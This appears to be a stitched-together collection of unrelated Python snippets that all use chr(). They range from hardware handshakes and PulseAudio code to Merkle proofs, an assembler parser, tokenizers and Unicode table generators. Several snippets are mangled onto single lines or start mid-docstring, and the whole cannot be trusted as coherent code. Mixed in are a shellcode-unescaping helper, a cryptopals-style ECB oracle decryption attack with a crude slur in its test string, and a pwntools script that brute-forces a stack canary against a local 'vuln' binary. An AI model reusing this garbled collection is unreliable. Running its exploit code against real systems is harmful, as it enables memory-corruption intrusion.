        # Handshake: write a 1 at offset 0, then poll offset 1 until the
        # Kinect program answers with a non-zero byte.
        self.shm.write_byte(chr(1))
        self.shm.seek(1)
        print "wrote 1"
        b = chr(0)
        while ord(b) == 0:
            b = self.shm.read_byte()
            self.shm.seek(1)
        print "recieved ", ord(b)
        time.sleep(0.1)
        print "Kinect programme pret pour enregistrement"
        self.isKinectConnected = True
        # Recording can only start once both the Kinect and the Android
        # side are connected.
        if self.isAndroidConnected:
            self.button_start_recording.config(state="normal")
        # initialize the communication flags
        self.shm.seek(0)
        self.shm.write_byte(chr(0))  # isTracking => 0
        self.shm.write_byte(chr(0))  # isRecording => 0
def build_shellcode(self, s): i = 0 sc = list() while i < len(s): if s[i] == '"': i += 1 continue if s[i] == '%': if (i + 6) <= len(s) and s[i + 1] == 'u': currchar = int(s[i + 2: i + 4], 16) nextchar = int(s[i + 4: i + 6], 16) sc.append(chr(nextchar)) sc.append(chr(currchar)) i += 6 elif (i + 3) <= len(s) and s[i + 1] == 'u': currchar = int(s[i + 2: i + 4], 16) sc.append(chr(currchar)) i += 3 else: sc.append(s[i]) i += 1 else: sc.append(s[i]) i += 1 return ''.join(sc)
def new_playback_stream(self, path):
    """Inspect a new PulseAudio playback stream (D-Bus object path) and
    print three JSON events on stdout: newStream, streamVolume, streamMute.
    """
    stream = self.bus.get_object(object_path=str(path))
    property_list = stream.Get('org.PulseAudio.Core1.Stream', 'PropertyList', dbus_interface='org.freedesktop.DBus.Properties')
    # Property values are NUL-terminated byte arrays; [:-1] drops the
    # terminator and chr() turns each byte into a character.
    pid = ''.join([chr(char) for char in dict(property_list)['application.process.id'][:-1]])
    binary = ''.join([chr(char) for char in dict(property_list)['application.process.binary'][:-1]])
    name = ''.join([chr(char) for char in dict(property_list)['application.name'][:-1]])
    # Volume is per-channel; only channel 0 is reported here.
    volume = int(stream.Get('org.PulseAudio.Core1.Stream', 'Volume', dbus_interface='org.freedesktop.DBus.Properties')[0])
    mute = bool(stream.Get('org.PulseAudio.Core1.Stream', 'Mute', dbus_interface='org.freedesktop.DBus.Properties'))
    # The sink's base volume serves as the "max" reference for the UI.
    base_volume = int(self.sink0.Get('org.PulseAudio.Core1.Device', 'BaseVolume', dbus_interface='org.freedesktop.DBus.Properties'))
    print(json.dumps({
        'newStream': {
            'pid': pid,
            'path': str(path),
            'name': name,
            'binary': binary,
        }
    }))
    print(json.dumps({
        'streamVolume': {
            'path': str(path),
            'volume': volume,
            'max': base_volume
        }
    }))
    print(json.dumps({
        'streamMute': {
            'path': str(path),
            'mute': mute,
        }
    }))
def check_inclusion_via_rfc_algorithm(hash, leaf_index, audit_path, tree_size, root_hash):
    """Verify a Merkle inclusion proof following the RFC 6962-bis
    pseudo-code (comments below quote the RFC steps).

    `hash` is the leaf hash, `audit_path` the list of sibling hashes
    (bytes), and the result is True when the recomputed root matches.
    """
    # 1. Set "fn" to "leaf_index" and "sn" to "tree_size - 1".
    fn, sn = leaf_index, tree_size - 1
    # 2. Set "r" to "hash".
    r = hash
    # 3. For each value "p" in the "audit_path" array:
    for p in audit_path:
        # If "LSB(fn)" is set, or if "fn" is equal to "sn", then:
        if lsb(fn) or (fn == sn):
            # 1. Set "r" to "HASH(0x01 || p || r)".
            # b"\x01" is the interior-node prefix: identical to the old
            # chr(1) on Python 2 and bytes-correct on Python 3.
            r = sha256(b"\x01" + p + r).digest()
            # 2. If "LSB(fn)" is not set, then right-shift both "fn" and
            # "sn" equally until either "LSB(fn)" is set or "fn" is "0".
            while not ((fn == 0) or lsb(fn)):
                fn >>= 1
                sn >>= 1
        # Otherwise:
        else:
            # Set "r" to "HASH(0x01 || r || p)".
            r = sha256(b"\x01" + r + p).digest()
        # Finally, right-shift both "fn" and "sn" one time.
        fn >>= 1
        sn >>= 1
    # 4. Compare "r" against the "root_hash". If they are equal,
    # then the log has proven the inclusion of "hash".
    return r == root_hash
def ParseLine():
    """
    We've got our source line. Now it's time to parse it all.
    However if we're defining a macro, we take a detour.
    First we look if it's an empty line or a comment line.
    Then we extract the label field, if any.
    Then the mnemonic field, and act on its contents. It can be one of
    three things: a directive, a macro call or a mnemonic.
    Before executing the lot we also prepare the operand field.

    NOTE(review): this function's indentation was reconstructed from a
    whitespace-mangled source; verify the nesting of the label-reset and
    trailing listing sections against the project history.
    """
    global Asm, Flags, Label
    global current_aid_pointer
    global array_aid, ending_address  # JKL

    # Reset per-line parser state.
    dec.Asm.Parse_Pointer = 0
    dec.Asm.New_Label = ""
    dec.Asm.Mnemonic = ""
    dec.Asm.List_Line = ""
    dec.Asm.Timing = ""
    dec.Asm.List_Byte_Cnt = 0
    macrolevel = dec.Asm.Local_Index

    if dec.Asm.Parse_Line == chr(26) + " ":
        # Ctrl-Z, end mark for DOS files, ignore it
        return

    if dec.Asm.Macro_Def != '':
        # Defining a macro: add this line to the macro instead of assembling.
        macros.DefineMacro()
        return

    if dec.Asm.Cond_False == 0:
        # Conditional assembly is true. Have to assemble this line.
        # Select memory mode; may have been changed by the previous line.
        if dec.Asm.Memory == 0:
            dec.Asm.BOL_Address = dec.Asm.PH_Address
            dec.Asm.List_Address = dec.Asm.PH_Address
        elif dec.Asm.Memory == 1:
            dec.Asm.BOL_Address = dec.Asm.RM_Address
            dec.Asm.List_Address = dec.Asm.RM_Address
        else:
            dec.Asm.BOL_Address = dec.Asm.EM_Address
            dec.Asm.List_Address = dec.Asm.EM_Address

        if IsComment():
            # Do nothing if this line is empty or a comment line.
            return

        newlabel = GetLabelName()
        globlab = string.ascii_uppercase + '_'   # legal begin chars of a global label
        if len(newlabel) > 0 and (newlabel[0] in globlab):
            # New global label defined.
            newglobal = True
        else:
            # No new global label defined.
            newglobal = False

        if NowChar() == ":":
            # It's a macro label.
            IncParsePointer()
            if NowChar() != " ":
                # Can't be a bare ':'.
                errors.DoError('illlabel', False)
                return   # Don't bother to continue

        dec.Asm.New_Label = newlabel
        if len(newlabel) > 0:
            # Do a boundary sync if a label is given.
            target.BoundarySync()

        dec.Asm.Mnemonic = GetMnemonic()
        if dec.Asm.Mnemonic == "":
            # No mnemonic means no operand either.
            dec.Asm.Parse_Pointer = 0
        else:
            # Parse the operand field.
            dec.Asm.Parse_Pointer = FindOperandField()

        if newglobal and dec.Asm.Mnemonic[:3] != '.SE':
            # Set last assigned global label name, only when not a .SE
            # directive, and reset the macro indexes.
            dec.Asm.Last_Global = newlabel
            dec.Asm.Macro_Number = 0
            dec.Asm.Local_Index = 0

        # Got all the ingredients, now put them all together.
        DoAssemble()

        if dec.Asm.New_Label != "":
            AssignLabel(dec.Asm.New_Label, macrolevel)
    else:
        # Conditional assembly is false: accept only .DO, .EL and
        # .FI directives.
        if IsComment():
            # Nothing to do in this line, it's a comment.
            return
        if NowChar() != " ":
            # A label is declared here; get it but don't bother about syntax.
            dec.Asm.New_Label = GetWord("", "", " ")
        dec.Asm.Mnemonic = GetMnemonic()
        #jkl
        #sys.stdout = sys.__stdout__
        if dec.Asm.Mnemonic != "":
            if dec.Asm.Mnemonic[:3] in (".DO", ".EL", ".FI"):
                # These are the only directives of interest now.
                dec.Asm.Parse_Pointer = FindOperandField()
                DoAssemble()

    # JKL NOX — capture the listing output of this line for the aid table.
    found_list = ""
    print("List_Line=" + str(dec.Asm.List_Line))
    if (len(dec.Asm.List_Line) > 0):
        print("found a list line!")
        found_list = len(dec.Asm.List_Line)
    if (found_list != ""):   # len(dec.Asm.List_Line) > 0):
        #print(str(hex(dec.Asm.BOL_Address)) + " " + dec.Asm.Mnemonic + " " + dec.Asm.List_Line[8:14] + " " + str(dec.Asm.List_Byte_Cnt) + " ")
        # TODO ADD LABEL HERE, LINK BACK IN TO NEW ADDITIONAL SYMBOL TABLE
        array_aid[dec.Asm.BOL_Address] = {'address': dec.Asm.BOL_Address, 'operator': dec.Asm.Mnemonic, 'operand': dec.Asm.List_Line[8:14], 'byte_cnt': dec.Asm.List_Byte_Cnt}
        print((array_aid[dec.Asm.BOL_Address]))
        ending_address = dec.Asm.BOL_Address
def append_charval(self, char_number):
    """Append the character whose code point is `char_number` to self.chars."""
    character = chr(char_number)
    self.chars.append(character)
def test_makeKeyTokens_(self):
    """Exercise QgsProject.readEntry() with XML-valid and XML-invalid key
    tokens and assert that a warning message is logged exactly for the
    invalid ones.
    """
    # see http://www.w3.org/TR/REC-xml/#d0e804 for a list of valid characters
    invalidTokens = []
    validTokens = []
    # all test tokens will be generated by prepending or inserting characters to this token
    validBase = "valid"
    # some invalid characters, not allowed anywhere in a token
    # note that '/' must not be added here because it is taken as a separator by makeKeyTokens_()
    invalidChars = "+*,;<>|!$%()=?#\x01"
    # generate the characters that are allowed at the start of a token (and at every other position)
    validStartChars = ":_"
    # NOTE(review): range(r[0], r[1]) excludes the upper bound, so the last
    # character of each (inclusive-looking) range is never tested — verify
    # whether r[1] + 1 was intended.
    charRanges = [
        (ord('a'), ord('z')),
        (ord('A'), ord('Z')),
        (0x00F8, 0x02FF),
        (0x0370, 0x037D),
        (0x037F, 0x1FFF),
        (0x200C, 0x200D),
        (0x2070, 0x218F),
        (0x2C00, 0x2FEF),
        (0x3001, 0xD7FF),
        (0xF900, 0xFDCF),
        (0xFDF0, 0xFFFD),
        #(0x10000, 0xEFFFF), while actually valid, these are not yet accepted by makeKeyTokens_()
    ]
    for r in charRanges:
        for c in range(r[0], r[1]):
            validStartChars += chr(c)
    # generate the characters that are only allowed inside a token, not at the start
    validInlineChars = "-.\xB7"
    charRanges = [
        (ord('0'), ord('9')),
        (0x0300, 0x036F),
        (0x203F, 0x2040),
    ]
    for r in charRanges:
        for c in range(r[0], r[1]):
            validInlineChars += chr(c)
    # test forbidden start characters
    for c in invalidChars + validInlineChars:
        invalidTokens.append(c + validBase)
    # test forbidden inline characters
    for c in invalidChars:
        invalidTokens.append(validBase[:4] + c + validBase[4:])
    # test each allowed start character
    for c in validStartChars:
        validTokens.append(c + validBase)
    # test each allowed inline character
    for c in validInlineChars:
        validTokens.append(validBase[:4] + c + validBase[4:])
    # self.catchMessage sets self.messageCaught when a log message arrives.
    logger = QgsApplication.messageLog()
    logger.messageReceived.connect(self.catchMessage)
    prj = QgsProject.instance()
    for token in validTokens:
        self.messageCaught = False
        prj.readEntry("test", token)
        myMessage = "valid token '%s' not accepted" % (token)
        assert not self.messageCaught, myMessage
    for token in invalidTokens:
        self.messageCaught = False
        prj.readEntry("test", token)
        myMessage = "invalid token '%s' accepted" % (token)
        assert self.messageCaught, myMessage
    logger.messageReceived.disconnect(self.catchMessage)
# Read a string and rebuild it: letters are copied through, while each digit
# is replaced by the character obtained by advancing the most recent letter
# by that many code points (e.g. "a2" -> "ac").
# NOTE(review): if the first character is not alphabetic, `previous` is
# unbound and this raises NameError; a non-digit, non-letter character makes
# int(x) raise ValueError. Confirm whether inputs are guaranteed to start
# with a letter and contain only letters/digits.
s=input('Enter Some String:')
output=''
for x in s:
    if x.isalpha():
        output=output+x
        previous=x   # remember the last letter seen, for digit expansion
    else:
        newch=chr(ord(previous)+int(x))
        output=output+newch
print(output)
def xor(data, key):
    """XOR each character of `data` with the corresponding character of
    `key`; the result is truncated to the shorter of the two inputs.
    """
    out = []
    for left, right in zip(data, key):
        out.append(chr(ord(left) ^ ord(right)))
    return ''.join(out)
# Byte-at-a-time ECB decryption with a random prefix (cryptopals-style).
# Python-2-only script (print statements, integer division for num_blocks);
# relies on external helpers detect_random_prefix_size() and enc_oracle().
random_prefix_size = randint(20,100)
print random_prefix_size
random_prefix = urandom(random_prefix_size)
target_message = "Rishabh Singh Aditya tiwari - lodu \Akaye - golu555555555"
blocksize = 16
(prefix_size ,unknown_size)= detect_random_prefix_size()
print(prefix_size , unknown_size , len(target_message))
num_blocks = unknown_size/blocksize
unknown_string = ""
# Pad the prefix to a block boundary; `skip` is the offset of the first
# fully attacker-controlled block in the oracle output.
extra = blocksize - prefix_size%blocksize
skip = prefix_size + extra
for num in range(num_blocks):
    # One-byte-short filler so a single unknown byte slides into the block.
    str1 = "A"*(extra+blocksize-1)
    for i in range(blocksize):
        test1 = enc_oracle(str1)
        # Build a dictionary of ciphertext block -> guessed plaintext for
        # every possible final byte, then look up the real ciphertext.
        # NOTE(review): range(255) never tries byte value 255 — a 0xFF in
        # the secret would raise KeyError; verify whether range(256) was
        # intended.
        matching = dict()
        for j in range(255):
            str2 = str1 + unknown_string + chr(j)
            matching[enc_oracle(str2)[skip+num*blocksize:skip+num*blocksize+blocksize]] = str2
        tmp1 = test1[skip+num*blocksize:skip+num*blocksize+blocksize]
        tmp2 = matching[tmp1]
        new_byte = tmp2[-1]
        unknown_string=unknown_string+new_byte
        str1 = str1[1:]
print unknown_string
def findTheDifference(self, s: str, t: str) -> str:
    """Return the one extra character in `t`, where `t` is `s` with a
    single added letter (LeetCode 389). Computed as the difference of the
    two strings' code-point sums.
    """
    total = 0
    for ch in t:
        total += ord(ch)
    for ch in s:
        total -= ord(ch)
    return chr(total)
def append_charval(self, char_number):
    """Append the code point `char_number`, encoded as a single
    ISO-8859-1 byte string, to self.chars.
    """
    character = chr(char_number)
    self.chars.append(character.encode('ISO-8859-1'))
def _Reserved(self, num_used):
    """Return the zero-byte filler that pads a packet out to
    self.length_packet - 1 after `num_used` bytes have been used.
    """
    assert(num_used >= 3 and num_used < self.length_packet - 1)
    pad_length = self.length_packet - num_used - 1
    return chr(0) * pad_length
octdigits -- a string containing all characters considered octal digits """ # Some strings for ctype-style character classification whitespace = ' \t\n\r\v\f' lowercase = 'abcdefghijklmnopqrstuvwxyz' uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' letters = lowercase + uppercase digits = '0123456789' hexdigits = digits + 'abcdef' + 'ABCDEF' octdigits = '01234567' # Case conversion helpers _idmap = '' for i in range(256): _idmap = _idmap + chr(i) del i # Backward compatible names for exceptions index_error = ValueError atoi_error = ValueError atof_error = ValueError atol_error = ValueError # convert UPPER CASE letters to lower case def lower(s): """lower(s) -> string Return a copy of the string s converted to lowercase. """
def __init__(self, username, password):
    """Keep the username, draw a 20-char random key, and store only the
    keyed hash of the password (never the plaintext)."""
    self.username = username
    key_chars = [chr(random.randint(48, 122)) for _ in range(20)]
    self.key = "".join(key_chars)
    self.password = hmac_md5(self.key, password)
def _StartCommand(self, byte): return chr(0xaa) + chr(self.address) + chr(byte)
def xor_encrypt(str, key):
    """XOR *str* (bytes) against *key* repeated as a running keystream.

    The result is re-encoded as Latin-1 so every XORed value 0-255 maps
    back to a single byte.
    """
    keystream = key
    while len(keystream) < len(str):
        keystream += key
    mixed = ''.join(chr(a ^ b) for a, b in zip(str, keystream))
    return mixed.encode('latin')
def pad(text, blocksize):
    """Apply PKCS#7-style padding to *text* (bytes).

    Appends n copies of the byte value n, where n is the count needed to
    reach the next multiple of *blocksize* (a full extra block when text
    is already aligned).
    """
    n = blocksize - len(text) % blocksize
    # BUG FIX: chr(n).encode() UTF-8-encodes values > 0x7f into TWO bytes,
    # corrupting the padding for block sizes over 127; bytes([n]) always
    # yields exactly one byte.  Also replaces the quadratic append loop.
    return text + bytes([n]) * n
def unicode_to_str(self, content):
    """Rebuild *content* character by character (identity copy for str input)."""
    return "".join(chr(ord(ch)) for ch in content)
def jbytes_to_str(jbytes):
    """Convert Java-style signed bytes (-128..127) to a str, mapping each
    to the character of its unsigned 0-255 value."""
    return "".join(chr(b & 255) for b in jbytes)
# Read a sentence, count each letter case-insensitively, and print the most
# frequent letter (uppercase) -- or '?' when there is a tie for first place.
sentence = input()

# 32 counting slots starting at code 65 ('A'); slot k counts chr(65+k) and
# chr(97+k), matching the original's scan range.
counts = [0] * 32
for ch in sentence:
    code = ord(ch)
    for slot in range(32):
        if code == 65 + slot or code == 65 + slot + 32:
            counts[slot] += 1
            break

highest = max(counts)
if counts.count(highest) > 1:
    print('?')
else:
    print(chr(65 + counts.index(highest)))
    @classmethod
    def read_squad_examples(cls, path, set_type):
        # Delegate to the shared SQuAD-style reader, binding this task's
        # Example class so parsed rows come back as cls.Example instances.
        return squad_style_template.generic_read_squad_examples(
            path=path,
            set_type=set_type,
            example_class=cls.Example,
        )


# === Evaluation === #
# MLQA has a slightly different evaluation / detokenization for different languages.
# Can de-dup this later if necessary.

# All Unicode code points whose category starts with "P" (punctuation),
# plus the ASCII punctuation set.
PUNCT = {
    chr(i) for i in range(sys.maxunicode)
    if unicodedata.category(chr(i)).startswith("P")
}.union(string.punctuation)
# Languages split on whitespace vs. mixed word/character segmentation.
WHITESPACE_LANGS = ["en", "es", "hi", "vi", "de", "ar"]
MIXED_SEGMENTATION_LANGS = ["zh"]


def whitespace_tokenize(text):
    # Plain whitespace split; used for WHITESPACE_LANGS.
    return text.split()


def mixed_segmentation(text):
    # Body continues beyond this chunk.
    segs_out = []
    temp_str = ""
    for char in text:
def clean(text):
    """Tokenize *text*: strip HTML entities, drop stopwords and single
    letters, and keep only tokens starting with a lowercase ASCII letter.

    Returns the surviving lowercase tokens joined by single spaces.
    Reads the stopword list from resources/stopwords.txt on every call.
    """
    # Drop HTML/XML entities such as &amp; or &#39; up front.
    text = re.sub('&.*?;', '', text)
    # Windows needs the explicit utf8 encoding; elsewhere use the default
    # (matches the original's two open() branches, now de-duplicated).
    encoding = 'utf8' if platform.system() == 'Windows' else None
    # BUG FIX: the original never closed the file handle, and called
    # re.sub('[\W]', '', raw, re.M) -- passing re.M (== 8) as the *count*
    # argument, so only the first 8 non-word characters were removed.
    # Strip punctuation while KEEPING the whitespace that separates words.
    with open('resources/stopwords.txt', 'r', encoding=encoding) as fh:
        raw = fh.read().lower()
    cleaned = re.sub(r'[^\w\s]', '', raw, flags=re.M)
    stopwords = set(re.split(r'[\s]', cleaned, flags=re.M)
                    + [chr(i) for i in range(ord('a'), ord('z') + 1)])
    stopwords.update(['"', "'", ':', ';', '(', ')', '[', ']', '{', '}'])
    tokens = [word.lower() for word in text.split() if word.lower() not in stopwords]
    return ' '.join(j for j in tokens if re.match('[a-z]', j))
def string(zahl):
    """Map a digit value to its character: 0-9 -> '0'-'9', 10+ -> 'A', 'B', ...
    (hex-style, since chr(55 + 10) == 'A')."""
    if zahl > 9:
        return chr(55 + zahl)
    return str(zahl)
def get_next_byte(self):
    """Read 8 bits from the stream and assemble them into one byte value.

    The first bit read is the LEAST significant (bit i carries weight 2**i),
    so the read order is reversed before parsing as base-2.
    """
    bits = [str(self.get_next_bit()) for _ in range(8)]
    return int("".join(reversed(bits)), 2)


reader = ImageReader(base_image)
text_length = reader.read_text_length()
print("Text length: {}".format(text_length))

# Pull the hidden message out byte by byte and echo it.
text_bytes = [reader.get_next_byte() for _ in range(text_length)]
for b in text_bytes:
    print(chr(b), end="")
print()
print("bits read: {}".format(reader.bits_read))
# hex+hex=hex
# 1+1=window
l1 = [
    0x23, 0x49, 0x16, 0x46, 0x45, 0x16, 0x3c, 0x3c, 0x45, 0x64, 0x16, 0x37,
    0x3c, 0x3c, 0x3c, 0x16, 0x46, 0x45, 0x37, 0x1e, 0x49, 0x16, 0x46, 0x49,
    0x16, 0x1e, 0x16, 0x32, 0x32, 0x3c, 0x32, 0x49, 0x3c, 0x64, 0x1e, 0x32,
    0x3c, 0x18, 0x64, 0x32, 0x32, 0x50, 0x14, 0x64, 0x32, 0x5a, 0x45, 0x32,
    0x32, 0x55, 0x50, 0x49, 0x3c, 0x14, 0x3c, 0x5f
]
l2 = [
    0x26, 0x2b, 0x0a, 0x23, 0x2e, 0x0a, 0x29, 0x25, 0x2e, 0x15, 0x0a, 0x37,
    0x25, 0x25, 0x2c, 0x0a, 0x23, 0x2e, 0x37, 0x09, 0x2b, 0x0a, 0x23, 0x2b,
    0x0a, 0x21, 0x0a, 0x30, 0x31, 0x25, 0x31, 0x2b, 0x2a, 0x17, 0x13, 0x2d,
    0x2c, 0x18, 0x0c, 0x01, 0x2d, 0x29, 0x1c, 0x11, 0x2d, 0x1b, 0x2e, 0x01,
    0x2d, 0x1b, 0x29, 0x2b, 0x2c, 0x1c, 0x32, 0x1e
]

# Pair each l1 value with the current head of l2 (consuming it, as the
# original's pop(0)/break inner loop did) and decode one character per pair.
flag = []
for a in l1:
    flag.append(chr(a + l2.pop(0)))
print(''.join(flag))
# Brute-force a 4-byte stack canary one byte at a time against ./vuln:
# the service answers 'Ok..' only when the guessed byte leaves the canary
# intact, so each confirmed byte narrows the next round to 256 guesses.
from pwn import *
canary = ''
for i in range(0, 4):
    for j in range(0, 256):
        io = process('./vuln')
        padding = 'A'*32  # overflow filler up to the canary
        try:
            # send length first, then the payload: filler + known canary
            # prefix + the candidate byte
            input_string = padding + canary + chr(j)
            io.sendline(str(len(input_string)))
            io.recvuntil('Input> ')
            io.sendline(input_string)
            response = io.recvline()
            if 'Ok..' in response:
                # guess survived the canary check: lock the byte in
                canary += chr(j)
                break
        except:
            # NOTE(review): bare except silently swallows crashes/EOFs from
            # wrong guesses; the break above also skips io.close() on success.
            pass
        io.close()
print("CANARY FOUND : " + canary)
def print_outputs(outputs: List[int]):
    """Decode a list of code points to text and print it on one line."""
    text = "".join(map(chr, outputs))
    print(text)
def __call__(self):
    """Read one keypress from the Windows console and return it as a 1-char str."""
    import msvcrt
    key = msvcrt.getch()  # bytes, e.g. b'a'; [0] gives the int code point
    return chr(key[0])
    # Tail of the neighbour-search function that starts above this chunk:
    # remember the best candidate found and report where water flows next.
    best_val = grid[r][c]
    best_pos = (r, c)
    return best_pos


def do_flow(grid, ans, r, c, v):
    # Label drainage basins: each cell takes the label of the sink its
    # water reaches.  Results are memoized in ans; v is the next fresh label.
    if ans[r][c] is not None:
        return ans[r][c]
    R, C = flow_to(grid, r, c)
    if R == r and C == c:
        ans[r][c] = v  # (r, c) is a sink: give it the fresh label
    else:
        ans[r][c] = do_flow(grid, ans, R, C, v)  # inherit the downstream label
    return ans[r][c]


# Driver (Python 2: print statement, map() returns a list): read T cases,
# label every cell, and print each row's labels as letters 'a', 'b', ...
for t in range(T):
    H, W = map(int, readline().split())
    grid = []
    ans = []
    for r in range(H):
        ans.append([None] * W)
        grid.append(map(int, readline().split()))
    print "Case #%d:" % (t + 1)
    v = 0
    for r in range(H):
        for c in range(W):
            # bump v so the next sink discovered gets an unused label
            v = max(do_flow(grid, ans, r, c, v) + 1, v)
        print ' '.join(chr(i + ord('a')) for i in ans[r])
def updateCaseSensitivityBlock(filename, test=False):
	"""Build a block-compressed case-sensitivity bitmap and emit C tables.

	Scans every Unicode code point, packs "is case sensitive" flags into
	32-bit masks, de-duplicates fixed-size blocks of masks, and writes the
	resulting index/mask tables plus a C lookup helper into *filename*.
	When *test* is true, a standalone compilable test file is written
	instead of regenerating the //case section in place.
	"""
	def getBitCount(value):
		# number of significant bits in value
		return len(bin(value)) - 2

	caseTable = ['0']*UnicodeCharacterCount
	maskTable = [0] * (UnicodeCharacterCount >> 5)
	first = 0x600  # code points below this use the direct bitmap in C
	maxCh = 0
	for ch in range(UnicodeCharacterCount):
		if isCaseSensitive(chr(ch)):
			maxCh = ch
			caseTable[ch] = '1'
			maskTable[ch >> 5] |= (1 << (ch & 31))

	# divide characters into blocks, filter out blocks with all character not case sensitive.
	blockSizeBit = 2
	blockSize = 1 << blockSizeBit
	firstCount = first >> 5
	maskCount = 1 + (maxCh >> 5)
	maskCount = blockSize * ((maskCount + blockSize - 1) // blockSize)  # round up to whole blocks
	maskList = maskTable[:firstCount]
	blockIndexValueBit = 7
	blockIndexCount = 1 << blockIndexValueBit
	blockList = []
	blockData = [(0, 0)] * blockIndexCount
	blockIndex = [0] * blockIndexCount
	maxBlockId = (maskCount // blockSize - 1) >> blockIndexValueBit
	blockBitCount = getBitCount(maxBlockId)
	indexBitCount = 8 - blockBitCount  # bits per byte left for the block's index value
	maxIndex = 1 << indexBitCount
	overlapped = False
	for i in range(firstCount, maskCount, blockSize):
		block = tuple(maskTable[i:i+blockSize])
		if sum(block) == 0:
			continue  # all-zero block: nothing case sensitive in this range
		try:
			index = blockList.index(block)
		except ValueError:
			index = len(blockList)
			blockList.append(block)
		index += 1  # index 0 is reserved to mean "no block"
		blockId = i // blockSize
		blockSlot = blockId & (blockIndexCount - 1)
		if blockData[blockSlot][1]:
			print('multi block', blockId, blockSlot, blockData[blockSlot], index)
		if index > maxIndex:
			overlapped = True
			print('overlapped block', blockId, blockSlot, index)
		blockId = blockId >> blockIndexValueBit
		blockData[blockSlot] = (blockId, index)
		# pack the block id's high bits together with the block's table index
		blockIndex[blockSlot] = index | (blockId << indexBitCount)

	#lines = []
	#for i in range(0, len(blockData), 8):
	#	line = ', '.join('(%d,%2d)' % item for item in blockData[i:i+8])
	#	lines.append(line)
	#print('\n'.join(lines))
	if overlapped:
		# packing failed: an index no longer fits in its slot; abort generation
		return

	indexTable = []
	for block in blockList:
		for mask in block:
			try:
				index = maskList.index(mask)
			except ValueError:
				index = len(maskList)
				maskList.append(mask)
			indexTable.append(index)

	size = len(blockIndex) + len(indexTable) + len(maskList)*4
	print('caseBlock', blockSize, len(maskList), len(blockIndex), len(indexTable), size)
	output = ["// Created with Python %s, Unicode %s" % (
		platform.python_version(), unicodedata.unidata_version)]
	output.append('#define kUnicodeCaseSensitiveFirst\t0x%04xU' % first)
	output.append('#define kUnicodeCaseSensitiveMax\t0x%04xU' % maxCh)
	output.append('')
	output.append('static const uint8_t UnicodeCaseSensitivityIndex[] = {')
	output.append('// block index')
	for i in range(0, len(blockIndex), 32):
		line = ', '.join(map(str, blockIndex[i:i+32]))
		output.append(line + ',')
	output.append('// mask index')
	for i in range(0, len(indexTable), 32):
		line = ', '.join(map(str, indexTable[i:i+32]))
		output.append(line + ',')
	output.append('};')
	output.append('')
	output.append('static const uint32_t UnicodeCaseSensitivityMask[] = {')
	for i in range(0, len(maskList), 8):
		line = ', '.join('0x%08xU' % mask for mask in maskList[i:i+8])
		output.append(line + ',')
	output.append('};')

	indexMask = (1 << indexBitCount) - 1
	indexOffset = blockIndexCount - blockSize
	# the condition is: index != 0 && (index >> indexBitCount) == (block >> blockIndexValueBit)
	# => index != 0 && ((index >> indexBitCount) ^ (block >> blockIndexValueBit)) == 0
	# set block = index ^ (block >> (blockIndexValueBit - indexBitCount)
	# => index != 0 && (block >> indexBitCount) == 0
	# => index != 0 && block < indexMask + 1
	# set diff = block - (indexMask + 1), with 2's complement, when diff >= 0, diff >> 8 is zero;
	# when diff < 0, diff >> 8 has 24-bit (or 32-bit using arithmetic shift right) 1s on the right.
	function = f"""
// case sensitivity for ch in [kUnicodeCaseSensitiveFirst, kUnicodeCaseSensitiveMax]
static inline int IsCharacterCaseSensitiveSecond(uint32_t ch) {{
	uint32_t block = ch >> {blockSizeBit + 5};
	uint32_t index = UnicodeCaseSensitivityIndex[block & {hex(blockIndexCount - 1)}];
	block = index ^ (block >> {blockIndexValueBit - indexBitCount});
	index &= ((block - {hex(indexMask + 1)}) >> 8) & {hex(indexMask)};
	if (index) {{
		ch = ch & {hex(blockSize*32 - 1)};
		index = {indexOffset} + (index << {blockSizeBit});
		index = UnicodeCaseSensitivityIndex[index + (ch >> 5)];
		return bittest(UnicodeCaseSensitivityMask + index, ch & 31);
	}}
	return 0;
}}
"""
	output.extend(function.splitlines())
	if not test:
		Regenerate(filename, "//case", output)
		return

	# test mode: write a self-contained C++ file plus exhaustive test data
	with open(filename, 'w', encoding='utf-8') as fd:
		fd.write(r"""#include <cstdint>
#include "../include/VectorISA.h"

""")
		fd.write('\n'.join(output))
		fd.write(r"""
int IsCharacterCaseSensitive(uint32_t ch) {
	if (ch < kUnicodeCaseSensitiveFirst) {
		return bittest(UnicodeCaseSensitivityMask + (ch >> 5), ch & 31);
	}
	if (ch > kUnicodeCaseSensitiveMax) {
		return 0;
	}
	return IsCharacterCaseSensitiveSecond(ch);
}
""")
		addCaseSensitivityTest(fd, caseTable, maskCount*32)
def genrate_session_token(lenght=10):
    """Return a random session token of *lenght* lowercase letters and digits.

    Uses random.SystemRandom (os.urandom-backed), so the token is suitable
    for security-sensitive use.  (Function/parameter spelling is kept as-is
    for existing callers.)
    """
    # Hoisted out of the loop: the original rebuilt the 36-element alphabet
    # list AND a fresh SystemRandom instance for every single character.
    alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
    rng = random.SystemRandom()
    return ''.join(rng.choice(alphabet) for _ in range(lenght))
def updateCaseSensitivity(filename, test=False):
	"""Build flat case-sensitivity mask tables and emit them as C code.

	Like updateCaseSensitivityBlock but compresses the per-32-char mask
	index with compressIndexTable instead of hand-rolled block packing.
	When *test* is true, a standalone compilable test file is written
	instead of regenerating the //case section in place.
	"""
	caseTable = ['0']*UnicodeCharacterCount
	maskTable = [0] * (UnicodeCharacterCount >> 5)
	first = 0x600  # code points below this use the direct bitmap in C
	maxCh = 0
	for ch in range(UnicodeCharacterCount):
		if isCaseSensitive(chr(ch)):
			maxCh = ch
			caseTable[ch] = '1'
			maskTable[ch >> 5] |= (1 << (ch & 31))

	maskCount = 1 + (maxCh >> 5)
	maskList = maskTable[:(first >> 5)]
	maskTable = maskTable[len(maskList):maskCount]
	# de-duplicate masks: indexTable maps each 32-char span to a maskList slot
	indexTable = []
	for mask in maskTable:
		try:
			index = maskList.index(mask)
		except ValueError:
			index = len(maskList)
			maskList.append(mask)
		indexTable.append(index)

	print('Unicode Case Sensitivity maskList:', len(maskList), 'indexTable:', len(indexTable), maskCount, maxCh)
	args = {
		'table': 'UnicodeCaseSensitivityIndex',
		'with_function': False,
	}
	# compressIndexTable fills args with the shift/mask/offset parameters
	# consumed by the C template below
	table, function = compressIndexTable('Unicode Case Sensitivity', indexTable, args)
	table = 'static ' + table

	output = ["// Created with Python %s, Unicode %s" % (
		platform.python_version(), unicodedata.unidata_version)]
	output.append('#define kUnicodeCaseSensitiveFirst\t0x%04xU' % first)
